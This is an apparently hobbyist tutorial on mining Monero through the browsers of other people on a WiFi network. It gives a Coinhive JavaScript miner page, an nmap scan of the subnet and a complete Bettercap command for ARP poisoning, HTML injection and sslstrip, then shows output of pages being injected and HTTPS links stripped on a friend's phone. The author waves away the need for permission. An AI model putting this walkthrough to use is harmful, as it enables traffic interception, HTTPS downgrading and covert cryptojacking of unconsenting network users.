Mining Monero from your WIFI clients

Simple educational project.

Requirements: [linux][kali-linux][bettercap][nmap]

Today we try to will mine some Monero off browsers from people on your network using a coinhive account and Bettercap.
We will create a Javascript miner and save it as an HTML document, start a Man In The Middle attack with Bettercap, injecting the js miner in all html pages the target visits.
Make sure you have permission of your target(s) when performing this. [rolls eyes]

First, get set up on coinhive.

Then go to Settings > Sites & API Keys and keep the Site Key (public) close somewhere. It looks something like this 8sBsEDSasdaea424ayAX5Cu3xvW.

Done?...
........Cool!

Now we are going to craft our baddie, the js miner!
It's an HTML file containing only a couple of script tags, one including the coinhive js library and the second one for the miner code.
Mine looks like this, I saved it in /var/www/html/ and gave it a bad ass name to impress the ladies :)
I will go over it in a sec...

[file: m1n3r.html]

<script src=https://coinhive.com/lib/coinhive.min.js></script>
<script>
// create an instance of the miner
var m1n3r = new CoinHive.Anonymous('REMEMBER_THE_KEY_YOU_JUST_PUT_AWAY?');
// start the lil guy
m1n3r.start();
</script>

So just as I said before, first <script> loads the library and the second we create the miner.
We do so by calling the CoinHive.Anonymous function and passing the site key from CH.
Damn simple, yet pretty cool you will see!
We are ready to move forward on our educational project.

Next step is to identify our target and use Bettercap to ARP poison attack to intercept traffic and use its plugin to inject html.
There are several ways to accomplish this but I chose Bettercap, my decision!..
Let's search for our target, I already know a little of my target. It's going to be my friend's phone.
Lets search the whole subnet real quick.

$ nmap -sS 192.168.20.1/24

So this is my target

$ Nmap scan report for 192.168.20.10

Host is up (0.0047s latency).
All 1000 scanned ports on 192.168.20.10 are closed
MAC Address: XX:XX:XX:XX:XX:XX (Samsung Electro-mechanics(thailand))

Now we start betercap on our interface targetting 192.168.20.10 and specifiying the HTML file to inject, I also specified the router address.

$ bettercap -I wlan0 -T 192.168.20.10 --proxy-module injecthtml --html-file /var/www/html/m1n3r.html -G 192.168.20.1

We fire it up and wait for it to take effect, output looks like this at first:

[I] Starting [ spoofing:✔ discovery:✘ sniffer:✘ tcp-proxy:✘ udp-proxy:✘ http-proxy:✔ https-proxy:✘ sslstrip:✔ http-server:✘ dns-server:✔ ] ...
[I] [wlan0] 192.168.20.10 : XX:XX:XX:XX:XX:XX / wlan0 ( Intel Corporate )
[I] [GATEWAY] 192.168.20.1 : XX:XX:XX:XX:XX:XX ( Cisco Spvtg )
[I] [DNS] Starting on 192.168.20.12:5300 ...
[I] [TARGET] 192.168.20.10 : XX:XX:XX:XX:XX:XX ( Samsung Electro-mechanics(thailand) )
[I] [HTTP] Proxy starting on 192.168.20.12:8080 ...

Once the users browses the net, HTTP traffic will be intercepted and injected to the user.

Kinda looks like this:

[192.168.20.10] GET http://particular.site.com/ ( text/html ) [302]
[I] [INJECTHTML] Injecting HTML code into http://particular.site.com/
[192.168.20.10] GET http://particular.site.com/ ( text/html ) [200]
[I] [SSLSTRIP 192.168.20.10] Stripping 21 HTTPS links inside 'http://particular.site.com/'.
[I] [INJECTHTML] Injecting HTML code into http://particular.site.com/

Now go back and monitor your coinhive dashboard, you are successfully mining off your wifi clients!
Hope you had fun if you followed along and hope you learned something from it just as I did.

Cheers!